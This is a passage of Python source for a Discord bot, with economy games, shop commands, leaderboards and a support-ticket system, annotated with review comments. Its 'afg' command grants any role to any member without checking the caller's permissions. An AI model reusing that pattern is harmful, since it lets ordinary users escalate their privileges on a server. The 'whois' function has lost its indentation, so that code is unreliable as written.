        await ctx.send('It is useless to rob him :(')
    elif member.id == 599266233350881291:
        await ctx.send('Imagine wanting to rob the owner of the server. Shame on you.<a:_2:844371369575710740>')
    elif member.id == 833122385603461121:
        await ctx.send("You are a sin to the world for robbing the very bot that is giving you money. <:_1:844623543966629937>")
    elif member == ctx.author:
        await ctx.send("Why do you want to steal from yourself??")
    elif bal[1] < 10001:
        # NOTE(review): this tests the *victim's* bank balance, but the
        # message reads as if it should gate on the robber's funds — confirm.
        await ctx.send("dude stealing money takes prep and money come back later when you have some stonks")
        return
    else:
        # Values above 5 (6, 7, 8, 9, 19) succeed -> 50/50 odds.
        # Fix: removed leftover debug prints and a redundant tuple() wrap.
        moneycoin = [1, 2, 3, 4, 5, 6, 7, 8, 9, 19]
        result = random.choice(moneycoin)
        if result > 5:
            win = random.randint(10, bal[0])
            await update_bank(ctx.author, win)
            await update_bank(member, -win)
            await ctx.send(f"You just robbed {member} of {win} coins")
        else:
            await update_bank(ctx.author, -100)
            await update_bank(member, 100)
            await ctx.send("The police found you and you got fined $100")
# @bot.command()
# @commands.cooldown(1, 25, commands.BucketType.user)
# async def slots(ctx,amount = None):
# await open_account(ctx.author)
# if amount == None:
# await ctx.send("Please enter the amount")
# return
# bal = await update_bank(ctx.author)
# amount = int(amount)
# if amount > 5000:
# await ctx.send("Hold up thats a lot of money, no way are we letting you inflate the economy")
# return
# if amount > bal[0]:
# await ctx.send('You do not have sufficient balance')
# return
# if amount < 0:
# await ctx.send('Amount must be positive!')
# return
# final = []
# for i in range(4):
# a = random.choice(['🐉','🍎','🦠','🍇'])
# final.append(a)
# await ctx.send(str(final))
# if final[0] == final[1] or final[1] == final[2] or final[0]== final[2] or final[0] == final[3] or final[1] == final[3] or final[2] == final[3]:
# if amount > 2001:
# await update_bank(ctx.author,1.5*amount)
# await ctx.send(f'You won :) {ctx.author.mention}')
# await ctx.send(f'You won! 1.5x your amount')
# if amount < 2000:
# await update_bank(ctx.author,2*amount)
# await ctx.send(f'You won :) {ctx.author.mention}')
# await ctx.send(f'You won! 2x your amount')
# if amount == 2000:
# await update_bank(ctx.author,1.5*amount)
# await ctx.send(f'You won :) {ctx.author.mention}')
# await ctx.send(f'You won! 1.5x your amount')
# #if final[0] == final[1] or final[1] == final[2] or final[0] == final[2]:
# # await update_bank(ctx.author,1.5*amount)
# # await ctx.send(f'You won 1.5 your amount {ctx.author.mention}')
# else:
# await update_bank(ctx.author,-1*amount)
# await ctx.send(f'You lose :( {ctx.author.mention}')
# print(bal)
@bot.command()
@commands.cooldown(1, 20, commands.BucketType.user)
async def bet(ctx, amount=None):
    """Bet coins: a 2-in-5 roll wins 2x the stake, otherwise the stake is lost.

    Stakes above 20000 coins or above the author's wallet are rejected.
    """
    await open_account(ctx.author)
    # Fix: the None check used to run *after* int(amount), so omitting the
    # argument crashed with TypeError before the friendly message was sent.
    if amount is None:
        await ctx.send("Enter some money smh")
        return
    try:
        amount = int(amount)
    except ValueError:
        await ctx.send("Enter some money smh")
        return
    if amount > 20000:
        await ctx.send("Hold up thats a lot of money, no way are we letting you inflate the economy")
        return
    bal = await update_bank(ctx.author)
    if amount > bal[0]:
        # Fix: this send was missing its `await` and never reached Discord.
        await ctx.send("Dont bet more then what you have")
        return
    else:
        ghot = random.randrange(5)
        if ghot == 2 or ghot == 4:
            embed = discord.Embed(title=f"{ctx.author.name}'s **winning** bet", colour=discord.Colour.gold())
            embed.add_field(name="Lucky Number:", value=f"<:_69:848699585370652683>", inline=False)
            embed.add_field(name="Amount Won:", value=f"{amount*2} coins!", inline=False)
            await ctx.send(embed=embed)
            await update_bank(ctx.author, amount*2)
        else:
            emojilist = ["<:_9:848707905950842880>", "<:_7:848707453318463489>", "<:_8:848708122691371030>"]
            chosen = random.choice(emojilist)
            embed = discord.Embed(title=f"{ctx.author.name}'s **losing** bet", colour=discord.Colour.gold())
            embed.add_field(name="Unlucky Number:", value=f"{chosen}", inline=False)
            embed.add_field(name="Amount Lost:", value=f"{amount} coins!", inline=False)
            await ctx.send(embed=embed)
            await update_bank(ctx.author, -amount)
@bot.command(aliases=[])
@commands.cooldown(1, 20, commands.BucketType.user)
async def slots(ctx, amount=None):
    """Slot machine: spin three random emoji for a stake of `amount`.

    Payouts: three coin emoji -> 7x, any three alike -> 5x, an adjacent
    pair -> 2x, otherwise nothing. The stake itself is always deducted at
    the end, so the jackpot nets 6x and a losing spin nets -1x.
    """
    await open_account(ctx.author)
    # Fix: the None check used to run *after* int(amount), so omitting the
    # argument crashed with TypeError; also guard non-numeric input.
    if amount is None:
        await ctx.send("Please enter the amount")
        return
    try:
        amount = int(amount)
    except ValueError:
        await ctx.send("Please enter the amount")
        return
    bal = await update_bank(ctx.author)
    if amount > 5000:
        await ctx.send("Hold up thats a lot of money, no way are we letting you inflate the economy")
        return
    if amount > bal[0]:
        await ctx.send('You do not have sufficient balance')
        return
    else:
        final = []
        for i in range(3):
            a = random.choice(["👾","🪙", "🎩","🦌","🐈⬛"])
            final.append(a)
        # 🪙 is the jackpot emoji.
        if final[0] == final[1] == final[2] == "🪙":
            embed = discord.Embed(
                title=f"{ctx.author.name}'s Slot Game",
                colour=discord.Colour.gold()
            )
            embed.add_field(name="Result:", value=f"{final[0]} {final[1]} {final[2]}", inline=False)
            embed.add_field(name="Jackpot!", value="Y-You actually made your mom proud", inline=False)
            embed.add_field(name="Amount Won:", value=f"{amount*7} coins!", inline=False)
            await ctx.send(embed=embed)
            await update_bank(ctx.author, amount*7)
        elif final[0] == final[1] == final[2]:
            embed = discord.Embed(
                title=f"{ctx.author.name}'s Slot Game",
                colour=discord.Colour.green()
            )
            embed.add_field(name="Result:", value=f"{final[0]} {final[1]} {final[2]}", inline=False)
            embed.add_field(name="Three in a row!", value="You got three of the same emoji!", inline=False)
            embed.add_field(name="Amount Won:", value=f"{amount*5} coins!", inline=False)
            await ctx.send(embed=embed)
            await update_bank(ctx.author, amount*5)
        elif final[0] == final[1] or final[1] == final[2]:
            embed = discord.Embed(
                title=f"{ctx.author.name}'s Slot Game",
                colour=discord.Colour.green()
            )
            embed.add_field(name="Result:", value=f"{final[0]} {final[1]} {final[2]}", inline=False)
            embed.add_field(name="Amount Won:", value=f"{amount*2} coins... thats all you could get?", inline=False)
            await ctx.send(embed=embed)
            await update_bank(ctx.author, amount*2)
        else:
            embed = discord.Embed(
                title=f"{ctx.author.name}'s Slot Game",
                colour=discord.Colour.red()
            )
            embed.add_field(name="Result:", value=f"{final[0]}{final[1]}{final[2]}", inline=False)
            embed.add_field(name="You lost...", value="You lost?, No wonder your mom disowned you", inline=False)
            embed.add_field(name="Amount Lost:", value=f"{amount} coins", inline=False)
            await ctx.send(embed=embed)
    # NOTE(review): the stake is deducted on *every* spin, wins included
    # (this line sits outside the win/lose branches) — confirm intended.
    await update_bank(ctx.author, -1*amount)
@bot.command()
async def bag(ctx):
    """Show the contents of the author's item bag in an embed."""
    await open_account(ctx.author)
    users = await get_bank_data()
    try:
        bag = users[str(ctx.author.id)]["bag"]
    except KeyError:
        # Fix: narrowed from a bare except — only a missing "bag" key means
        # the user simply owns nothing yet; other errors should surface.
        bag = []
    em = discord.Embed(title="Bag")
    for item in bag:
        em.add_field(name=item["item"], value=item["amount"])
    await ctx.send(embed=em)
async def buy_this(user, item_name, amount):
    """Buy `amount` of `item_name` from `mainshop` for `user`.

    Returns [True, "Worked"] on success, [False, 1] for an unknown item,
    or [False, 2] when the wallet cannot cover the cost.
    """
    item_name = item_name.lower()
    name_ = None
    for item in mainshop:
        name = item["name"].lower()
        if name == item_name:
            name_ = name
            price = item["price"]
            break
    if name_ is None:
        return [False, 1]
    cost = price * amount
    users = await get_bank_data()
    bal = await update_bank(user)
    if bal[0] < cost:
        return [False, 2]
    try:
        # Increment the count if the item is already in the bag,
        # otherwise append a fresh entry.
        t = None
        for index, thing in enumerate(users[str(user.id)]["bag"]):
            if thing["item"] == item_name:
                users[str(user.id)]["bag"][index]["amount"] = thing["amount"] + amount
                t = 1
                break
        if t is None:
            users[str(user.id)]["bag"].append({"item": item_name, "amount": amount})
    except KeyError:
        # Fix: narrowed from a bare except — only a missing "bag" key is
        # expected here (first purchase for this user).
        users[str(user.id)]["bag"] = [{"item": item_name, "amount": amount}]
    with open("mainbank.json", "w") as f:
        json.dump(users, f)
    await update_bank(user, cost * -1, "wallet")
    return [True, "Worked"]
@bot.command()
async def sell(ctx, item, amount=1):
    """Sell `amount` of `item` from the author's bag back to the shop."""
    await open_account(ctx.author)
    res = await sell_this(ctx.author, item, amount)
    if not res[0]:
        if res[1] == 1:
            await ctx.send("That Object isn't there!")
            return
        if res[1] == 2:
            await ctx.send(f"You don't have {amount} {item} in your bag.")
            return
        if res[1] == 3:
            await ctx.send(f"You don't have {item} in your bag.")
            return
    await ctx.send(f"You just sold {amount} {item}.")
async def sell_this(user, item_name, amount):
    """Sell `amount` of `item_name` from `user`'s bag, crediting the wallet.

    Fix: the body below was dangling inside `sell` with no enclosing def
    (referencing undefined `name_`, `price`, `user`), which raised NameError
    after the success message. Reconstructed as the missing `sell_this`
    helper, mirroring `buy_this`'s shop lookup.

    Returns [True, "Worked"] on success, [False, 1] for an unknown item,
    [False, 2] when fewer than `amount` are owned, [False, 3] when none are.
    """
    item_name = item_name.lower()
    name_ = None
    for shop_item in mainshop:
        name = shop_item["name"].lower()
        if name == item_name:
            name_ = name
            price = shop_item["price"]
            break
    if name_ == None:
        return [False,1]
    cost = price*amount
    users = await get_bank_data()
    bal = await update_bank(user)
    try:
        index = 0
        t = None
        for thing in users[str(user.id)]["bag"]:
            n = thing["item"]
            if n == item_name:
                old_amt = thing["amount"]
                new_amt = old_amt - amount
                if new_amt < 0:
                    return [False,2]
                users[str(user.id)]["bag"][index]["amount"] = new_amt
                t = 1
                break
            index+=1
        if t == None:
            return [False,3]
    except KeyError:
        # Narrowed from a bare except: a missing "bag" key means nothing owned.
        return [False,3]
    with open("mainbank.json","w") as f:
        json.dump(users,f)
    await update_bank(user,cost,"wallet")
    return [True,"Worked"]
@bot.command(aliases = ["lb"])
@commands.guild_only()
async def leaderboard(ctx, x=10):
    """Show the top `x` users ranked by wallet + bank total."""
    users = await get_bank_data()
    # Fix: the old amount->id dict silently dropped users with equal totals;
    # sort (total, id) pairs instead so everyone is ranked.
    totals = []
    for user_id in users:
        total_amount = users[user_id]["wallet"] + users[user_id]["bank"]
        totals.append((total_amount, int(user_id)))
    totals.sort(reverse=True)
    em = discord.Embed(title = f"Top {x} Richest People in this **server**" , description = "This is decided on the basis of raw money in the bank and wallet",color = discord.Color(0xfa43ee))
    index = 1
    for amt, id_ in totals:
        member = bot.get_user(id_)
        # Fix: bot.get_user can return None for uncached users; the old code
        # crashed on member.name. Fall back to the raw ID.
        name = member.name if member else str(id_)
        em.add_field(name = f"{index}. {name}" , value = f"{amt}", inline = False)
        if index == x:
            break
        index += 1
    await ctx.send(embed = em)
async def open_account(user):
    """Create a zeroed wallet/bank record for `user` if none exists yet.

    Returns True when a new account was created, False otherwise.
    """
    users = await get_bank_data()
    key = str(user.id)
    if key in users:
        return False
    users[key] = {"wallet": 0, "bank": 0}
    with open('mainbank.json', 'w') as f:
        json.dump(users, f)
    return True
# @bot.command()
# async def test(ctx,):
# if item=='laptop':
# print("f")
@bot.command(aliases = ["lbg"])
async def leaderboardglobal(ctx, x=10):
    """Show the top `x` users across all servers by wallet + bank total."""
    users = await get_bank_data()
    # Fix: the old amount->id dict silently dropped users with equal totals;
    # sort (total, id) pairs instead so everyone is ranked.
    totals = []
    for user_id in users:
        total_amount = users[user_id]["wallet"] + users[user_id]["bank"]
        totals.append((total_amount, int(user_id)))
    totals.sort(reverse=True)
    em = discord.Embed(title = f"Top {x} Richest People in the **world**" , description = "This is decided on the basis of raw money in the bank and wallet",color = discord.Color(0xfa43ee))
    index = 1
    for amt, id_ in totals:
        member = bot.get_user(id_)
        # Fix: bot.get_user can return None for uncached users; the old code
        # crashed on member.name. Fall back to the raw ID.
        name = member.name if member else str(id_)
        em.add_field(name = f"{index}. {name}" , value = f"{amt}", inline = False)
        if index == x:
            break
        index += 1
    await ctx.send(embed = em)
async def open_account(user):
    # NOTE(review): this is a byte-for-byte duplicate of the open_account
    # defined earlier in this file; this later definition is the one that
    # takes effect at import time. Consider removing one copy.
    """Create a zeroed wallet/bank record for `user` if none exists.

    Returns True when a new account was created, False if one existed.
    """
    users = await get_bank_data()
    if str(user.id) in users:
        return False
    else:
        users[str(user.id)] = {}
        users[str(user.id)]["wallet"] = 0
        users[str(user.id)]["bank"] = 0
        with open('mainbank.json','w') as f:
            json.dump(users,f)
        return True
async def get_bank_data():
    """Load and return the whole bank database from mainbank.json."""
    with open('mainbank.json', 'r') as handle:
        return json.load(handle)
async def update_bank(user, change=0, mode='wallet'):
    """Add `change` to `user`'s 'wallet' or 'bank' and persist the database.

    Returns the updated (wallet, bank) tuple. Call with change=0 to read.
    """
    users = await get_bank_data()
    account = users[str(user.id)]
    account[mode] += change
    with open('mainbank.json', 'w') as f:
        json.dump(users, f)
    return account['wallet'], account['bank']
@bot.command(pass_context=True)
async def afg(ctx, role: discord.Role, user: discord.Member):
    """Grant `role` to `user`, then acknowledge with a short "f" message."""
    await user.add_roles(role)
    await ctx.send("f")
@bot.command()
async def helpt(ctx):
    """Send the ticket-bot help embed.

    Authors holding a configured admin ("verified") role, or guild
    administrators, get the full admin command list; everyone else gets a
    short user-level help embed.
    """
    with open("data.json") as f:
        data = json.load(f)
    valid_user = False
    # Check whether the author holds any admin-level ("verified") role.
    for role_id in data["verified-roles"]:
        try:
            if ctx.guild.get_role(role_id) in ctx.author.roles:
                valid_user = True
        except:
            pass
    if ctx.author.guild_permissions.administrator or valid_user:
        em = discord.Embed(title="Stonk Tickets Help", description="", color=0x00a8ff)
        em.add_field(name="`+new <message>`", value="This creates a new ticket. Add any words after the command if you'd like to send a message when we initially create your ticket.")
        em.add_field(name="`+close`", value="Use this to close a ticket. This command only works in ticket channels.")
        em.add_field(name="`+addaccess <role_id>`", value="This can be used to give a specific role access to all tickets. This command can only be run if you have an admin-level role for this bot.")
        em.add_field(name="`+delaccess <role_id>`", value="This can be used to remove a specific role's access to all tickets. This command can only be run if you have an admin-level role for this bot.")
        em.add_field(name="`+addpingedrole <role_id>`", value="This command adds a role to the list of roles that are pinged when a new ticket is created. This command can only be run if you have an admin-level role for this bot.")
        em.add_field(name="`+delpingedrole <role_id>`", value="This command removes a role from the list of roles that are pinged when a new ticket is created. This command can only be run if you have an admin-level role for this bot.")
        em.add_field(name="`+addadminrole <role_id>`", value="This command gives all users with a specific role access to the admin-level commands for the bot, such as `.addpingedrole` and `.addaccess`. This command can only be run by users who have administrator permissions for the entire server.")
        em.add_field(name="`+deladminrole <role_id>`", value="This command removes access for all users with the specified role to the admin-level commands for the bot, such as `.addpingedrole` and `.addaccess`. This command can only be run by users who have administrator permissions for the entire server.")
        em.set_footer(text="Stonk Bot:bot made by DragonRoyal#7111")
        await ctx.send(embed=em)
        reaction = "📜"
        await ctx.message.add_reaction(emoji=reaction)
    else:
        # Non-admin users only see the basic ticket commands.
        em = discord.Embed(title = "Distrupt Tickets Help", description ="", color = 0x00a8ff)
        em.add_field(name="`+new <message>`", value="This creates a new ticket. Add any words after the command if you'd like to send a message when we initially create your ticket.")
        em.add_field(name="`.close`", value="Use this to close a ticket. This command only works in ticket channels.")
        em.set_footer(text="Doge Coin is cool")
        await ctx.send(embed=em)
@bot.command( aliases=['new','support'])
async def ticket(ctx, *, args=None):
    """Open a new support ticket channel for the author.

    Creates #ticket-N, hides it from @everyone, grants access to the
    configured roles plus the author, posts the opening message, pings
    the configured roles, and records the channel id in data.json.
    """
    await bot.wait_until_ready()
    if args is None:
        message_content = "Please wait, we will be with you shortly!"
    else:
        # Fix: `args` is already a single string (keyword-only rest
        # argument); "".join(args) merely re-joined its characters.
        message_content = args
    with open("data.json") as f:
        data = json.load(f)
    ticket_number = int(data["ticket-counter"])
    ticket_number += 1
    ticket_channel = await ctx.guild.create_text_channel("ticket-{}".format(ticket_number))
    # Hide the channel from @everyone (the guild's default role shares the guild id).
    await ticket_channel.set_permissions(ctx.guild.get_role(ctx.guild.id), send_messages=False, read_messages=False)
    for role_id in data["valid-roles"]:
        role = ctx.guild.get_role(role_id)
        await ticket_channel.set_permissions(role, send_messages=True, read_messages=True, add_reactions=True, embed_links=True, attach_files=True, read_message_history=True, external_emojis=True)
    await ticket_channel.set_permissions(ctx.author, send_messages=True, read_messages=True, add_reactions=True, embed_links=True, attach_files=True, read_message_history=True, external_emojis=True)
    em = discord.Embed(title="New ticket from {}#{}".format(ctx.author.name, ctx.author.discriminator), description= "{}".format(message_content), color=0x00a8ff)
    await ticket_channel.send(embed=em)
    pinged_msg_content = ""
    non_mentionable_roles = []
    if data["pinged-roles"] != []:
        for role_id in data["pinged-roles"]:
            role = ctx.guild.get_role(role_id)
            pinged_msg_content += role.mention
            pinged_msg_content += " "
            # Temporarily flip non-mentionable roles so the ping lands,
            # then restore them below.
            if role.mentionable:
                pass
            else:
                await role.edit(mentionable=True)
                non_mentionable_roles.append(role)
        await ticket_channel.send(pinged_msg_content)
        for role in non_mentionable_roles:
            await role.edit(mentionable=False)
    data["ticket-channel-ids"].append(ticket_channel.id)
    data["ticket-counter"] = int(ticket_number)
    with open("data.json", 'w') as f:
        json.dump(data, f)
    created_em = discord.Embed(title="Auroris Tickets", description="Your ticket has been created at {},".format(ticket_channel.mention), color=0x00a8ff)
    await ctx.send(embed=created_em)
@bot.command()
async def close(ctx):
    """Close the current ticket channel after a confirmation prompt.

    Only works inside a channel recorded in data.json's
    "ticket-channel-ids"; waits up to 60 s for the author to reply "close".
    """
    with open('data.json') as f:
        data = json.load(f)
    if ctx.channel.id in data["ticket-channel-ids"]:
        channel_id = ctx.channel.id
        # Confirmation must come from the same author, in the same channel.
        def check(message):
            return message.author == ctx.author and message.channel == ctx.channel and message.content.lower() == "close"
        try:
            em = discord.Embed(title="Stonk Tickets", description="Are you sure you want to close this ticket? Reply with `close` if you are sure.", color=0x00a8ff)
            await ctx.send(embed=em)
            await bot.wait_for('message', check=check, timeout=60)
            await ctx.channel.delete()
            # Forget the deleted channel so future `close` calls ignore it.
            index = data["ticket-channel-ids"].index(channel_id)
            del data["ticket-channel-ids"][index]
            with open('data.json', 'w') as f:
                json.dump(data, f)
        except asyncio.TimeoutError:
            em = discord.Embed(title="Stonk Tickets", description="You have run out of time to close this ticket. Please run the command again.", color=0x00a8ff)
            await ctx.send(embed=em)
@bot.command()
async def addaccess(ctx, role_id=None):
    """Give a role access to all tickets (admin-level command)."""
    with open('data.json') as f:
        data = json.load(f)
    valid_user = False
    # Fix: the loop variable used to be named `role_id`, clobbering the
    # command argument — the last verified role id (not the one the caller
    # passed) could end up being added.
    for verified_id in data["verified-roles"]:
        try:
            if ctx.guild.get_role(verified_id) in ctx.author.roles:
                valid_user = True
        except Exception:
            pass
    if valid_user or ctx.author.guild_permissions.administrator:
        role_id = int(role_id)
        if role_id not in data["valid-roles"]:
            try:
                role = ctx.guild.get_role(role_id)
                with open("data.json") as f:
                    data = json.load(f)
                data["valid-roles"].append(role_id)
                with open('data.json', 'w') as f:
                    json.dump(data, f)
                em = discord.Embed(title="Auroris Tickets", description="You have successfully added `{}` to the list of roles with access to tickets.".format(role.name), color=0x00a8ff)
                await ctx.send(embed=em)
            except (TypeError, ValueError, AttributeError):
                # get_role returning None (or a bad id) lands here.
                em = discord.Embed(title="Auroris Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
                await ctx.send(embed=em)
        else:
            em = discord.Embed(title="Auroris Tickets", description="That role already has access to tickets!", color=0x00a8ff)
            await ctx.send(embed=em)
    else:
        em = discord.Embed(title="Auroris Tickets", description="Sorry, you don't have permission to run that command.", color=0x00a8ff)
        await ctx.send(embed=em)
@bot.command()
async def delaccess(ctx, role_id=None):
    """Remove a role's access to all tickets (admin-level command)."""
    with open('data.json') as f:
        data = json.load(f)
    valid_user = False
    # Fix: the loop variable used to be named `role_id`, clobbering the
    # command argument — the wrong role could end up being removed.
    for verified_id in data["verified-roles"]:
        try:
            if ctx.guild.get_role(verified_id) in ctx.author.roles:
                valid_user = True
        except Exception:
            pass
    if valid_user or ctx.author.guild_permissions.administrator:
        try:
            role_id = int(role_id)
            role = ctx.guild.get_role(role_id)
            with open("data.json") as f:
                data = json.load(f)
            valid_roles = data["valid-roles"]
            if role_id in valid_roles:
                valid_roles.remove(role_id)
                data["valid-roles"] = valid_roles
                with open('data.json', 'w') as f:
                    json.dump(data, f)
                em = discord.Embed(title="Auroris Tickets", description="You have successfully removed `{}` from the list of roles with access to tickets.".format(role.name), color=0x00a8ff)
                await ctx.send(embed=em)
            else:
                em = discord.Embed(title="Auroris Tickets", description="That role already doesn't have access to tickets!", color=0x00a8ff)
                await ctx.send(embed=em)
        except (TypeError, ValueError, AttributeError):
            # Missing/non-numeric id, or get_role returning None.
            em = discord.Embed(title="Auroris Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
            await ctx.send(embed=em)
    else:
        em = discord.Embed(title="Auroris Tickets", description="Sorry, you don't have permission to run that command.", color=0x00a8ff)
        await ctx.send(embed=em)
@bot.command()
async def addpingedrole(ctx, role_id=None):
    """Add a role to those pinged on new tickets (admin-level command)."""
    with open('data.json') as f:
        data = json.load(f)
    valid_user = False
    # Fix: the loop variable used to be named `role_id`, clobbering the
    # command argument — the wrong role could end up being added.
    for verified_id in data["verified-roles"]:
        try:
            if ctx.guild.get_role(verified_id) in ctx.author.roles:
                valid_user = True
        except Exception:
            pass
    if valid_user or ctx.author.guild_permissions.administrator:
        role_id = int(role_id)
        if role_id not in data["pinged-roles"]:
            try:
                role = ctx.guild.get_role(role_id)
                with open("data.json") as f:
                    data = json.load(f)
                data["pinged-roles"].append(role_id)
                with open('data.json', 'w') as f:
                    json.dump(data, f)
                em = discord.Embed(title="Stonk Tickets", description="You have successfully added `{}` to the list of roles that get pinged when new tickets are created!".format(role.name), color=0x00a8ff)
                await ctx.send(embed=em)
            except (TypeError, ValueError, AttributeError):
                # get_role returning None (or a bad id) lands here.
                em = discord.Embed(title="Stonk Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
                await ctx.send(embed=em)
        else:
            em = discord.Embed(title="Stonk Tickets", description="That role already receives pings when tickets are created.", color=0x00a8ff)
            await ctx.send(embed=em)
    else:
        em = discord.Embed(title="Stonk Tickets", description="Sorry, you don't have permission to run that command.", color=0x00a8ff)
        await ctx.send(embed=em)
@bot.command()
async def testcool(ctx):
    # NOTE(review): `item` is not defined in this function; unless a
    # module-level `item` exists elsewhere in the file, invoking this
    # command raises NameError. Confirm and remove or fix.
    print(item)
@bot.command()
async def delpingedrole(ctx, role_id=None):
    """Remove a role from those pinged on new tickets (admin-level command)."""
    with open('data.json') as f:
        data = json.load(f)
    valid_user = False
    # Fix: the loop variable used to be named `role_id`, clobbering the
    # command argument — the wrong role could end up being removed.
    for verified_id in data["verified-roles"]:
        try:
            if ctx.guild.get_role(verified_id) in ctx.author.roles:
                valid_user = True
        except Exception:
            pass
    if valid_user or ctx.author.guild_permissions.administrator:
        try:
            role_id = int(role_id)
            role = ctx.guild.get_role(role_id)
            with open("data.json") as f:
                data = json.load(f)
            pinged_roles = data["pinged-roles"]
            if role_id in pinged_roles:
                pinged_roles.remove(role_id)
                data["pinged-roles"] = pinged_roles
                with open('data.json', 'w') as f:
                    json.dump(data, f)
                em = discord.Embed(title="Auroris Tickets", description="You have successfully removed `{}` from the list of roles that get pinged when new tickets are created.".format(role.name), color=0x00a8ff)
                await ctx.send(embed=em)
            else:
                em = discord.Embed(title="Auroris Tickets", description="That role already isn't getting pinged when new tickets are created!", color=0x00a8ff)
                await ctx.send(embed=em)
        except (TypeError, ValueError, AttributeError):
            # Missing/non-numeric id, or get_role returning None.
            em = discord.Embed(title="Auroris Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
            await ctx.send(embed=em)
    else:
        em = discord.Embed(title="Auroris Tickets", description="Sorry, you don't have permission to run that command.", color=0x00a8ff)
        await ctx.send(embed=em)
@bot.command()
@has_permissions(administrator=True)
async def addadminrole(ctx, role_id=None):
    """Add a role to the admin-level ("verified") roles list (admins only)."""
    try:
        role_id = int(role_id)
        role = ctx.guild.get_role(role_id)
        with open("data.json") as f:
            data = json.load(f)
        data["verified-roles"].append(role_id)
        with open('data.json', 'w') as f:
            json.dump(data, f)
        em = discord.Embed(title="Auroris Tickets", description="You have successfully added `{}` to the list of roles that can run admin-level commands!".format(role.name), color=0x00a8ff)
        await ctx.send(embed=em)
    # Fix: narrowed from a bare except so real I/O or JSON errors surface;
    # these three cover a missing/non-numeric id and get_role returning None.
    except (TypeError, ValueError, AttributeError):
        em = discord.Embed(title="Auroris Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
        await ctx.send(embed=em)
@bot.command()
@has_permissions(administrator=True)
async def deladminrole(ctx, role_id=None):
    """Remove a role from the admin-level ("verified") roles list (admins only)."""
    try:
        role_id = int(role_id)
        role = ctx.guild.get_role(role_id)
        with open("data.json") as f:
            data = json.load(f)
        admin_roles = data["verified-roles"]
        if role_id in admin_roles:
            admin_roles.remove(role_id)
            data["verified-roles"] = admin_roles
            with open('data.json', 'w') as f:
                json.dump(data, f)
            # Fix: the messages below were copy-pasted from delpingedrole and
            # wrongly talked about ping roles; corrected to admin roles.
            em = discord.Embed(title="Auroris Tickets", description="You have successfully removed `{}` from the list of roles that can run admin-level commands.".format(role.name), color=0x00a8ff)
            await ctx.send(embed=em)
        else:
            em = discord.Embed(title="Auroris Tickets", description="That role already can't run admin-level commands!", color=0x00a8ff)
            await ctx.send(embed=em)
    # Fix: narrowed from a bare except so real I/O or JSON errors surface.
    except (TypeError, ValueError, AttributeError):
        em = discord.Embed(title="Auroris Tickets", description="That isn't a valid role ID. Please try again with a valid role ID.")
        await ctx.send(embed=em)
@bot.event
async def on_message(message):
    # NOTE(review): a second `on_message` handler is registered later in this
    # file; with @bot.event only the last registration takes effect, so this
    # handler is dead code. Also note it never calls bot.process_commands,
    # which would disable all commands if it were the active handler.
    if message.content.startswith('you are'):
        await message.channel.send('NO U')
@bot.event
async def on_message(message):
    """Snark back when the bot is mentioned, then forward the message on."""
    if bot.user.mentioned_in(message):
        await message.channel.send('I see you are to good to just use +help for the commands. (Or your just mocking me or something) So for that reason i will make you cease to exist <a:_3:845491804429484064>')
    # Fix: overriding on_message without this call silently disables every
    # bot command (documented discord.py pitfall).
    await bot.process_commands(message)
#on bot join msg
@bot.event
async def on_guild_join(guild):
    """Greet a newly-joined guild in its #general channel, if we may post there."""
    general = find(lambda channel: channel.name == 'general', guild.text_channels)
    if general and general.permissions_for(guild.me).send_messages:
        await general.send('Hello {}! My prefix is + Do +help to learn more about my commands or +helpdm for the help commands to be dm'.format(guild.name))
#<EMAIL>()
#async def meme(ctx):
# async with aiohttp.BotSession() as cs:
# async with cs.get('https://www.reddit.com/r/dankmemes/new.json?sort=top') or cs.get('https://www.reddit.com/r/memes/new.json?sort=top') or cs.get('https://www.reddit.com/r/programmingmemes/new.json?sort=top') or cs.get('https://www.reddit.com/r/cleanmemes/new.json?sort=top') as r:
# res = await r.json()
#num = random.randint(0, len(res['data']['children'])-1)
#m = res['data']['children'] [num]['data']['url']
#e = Embed(description = f"**[{res['data']['children'] [num]['data']['title']}]({m})**", color=amberz)
# e.set_footer(text= res['data']['children'] [num]['data']['author'], icon_url=ctx.guild.icon_url)
#e.set_image(url = res['data']['children'] [num]['data']['url'])
# await ctx.send(embed=e)
#--------------REDDIT MEME GENERATION!----------------
# wont work
#reddit = asyncpraw.Reddit(client_id ='OK4gxau76j-sPw',
#client_secret ='<KEY>', user_agent = 'praw', username ='Dragonroyal', password = '<PASSWORD>',)
#subreddit = reddit.subreddit('memes')
#top = subreddit.top(Limit = 5)
#for submisson in top:
# print(submission.title)
#print("F")
#@bot.command()
#async def memeswork(ctx):
# print("Ff")
#subreddit = reddit.subreddit('memes')
#top = subreddit.top(Limit = 50)
#all_subs =[]
#for submission in top:
# all_subs.append(submission)
#print("FFf")
#random_sub = random.choice(all_subs)
#print("fffds")
#name = random_sub.title
#url = random_sub.url
#em = discord.Embed(title=name)
#em.set_image(url=url)
#print("ejksjs")
#await ctx.send(embed = em)
#@bot.command()
#async def memef(ctx):
# memes_submissions = reddit.subreddit('memes').hot()
# post_to_pick = random.randint(1, 10)
# for i in range(0, post_to_pick):
# submission = next(x for x in memes_submissions if not x.stickied)
# await bot.say(submission.url)
#who is command
@bot.command(aliases=["user"])
async def whois(ctx, member:discord.Member=None):
if member is None:
member = ctx.author
user = member
roles = [role for role in member.roles]
allroles = [role.mention for role in roles[1:]]
embed = discord.Embed(title = member.name , describtion = member.mention ,color = discord.Color(0x7289DA))
embed.add_field(name="Display Name:", value=member.display_name)
embed.add_field(name = "ID", value = member.id , inline = True)
embed.add_field(name="Created Account On:", value=member.created_at.strftime("%a, %#d %B %Y, %I:%M %p UTC"))
embed.add_field(name="Joined Server On:", value=member.joined_at.strftime("%a, %#d %B %Y, %I:%M %p UTC"))
embed.add_field(name=f"Roles (amount: {len(roles)}):", value="\n".join(allroles))
embed.add_field(name="Highest Role:", value=f"{member.top_role.mention if member.top_role else 'N/A'}")
embed.set_thumbnail(url = member.avatar_url)
embed.set_footer(icon_url = ctx.author.avatar_url, text = f"Requested by {ctx.author.name}")
await ctx.send(embed=embed)
@bot.command()
async def botservers(ctx):
    """Report how many guilds the bot is currently a member of."""
    guild_count = len(bot.guilds)
    await ctx.send(f"I'm in {guild_count} servers!")
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def kingruless(ctx):
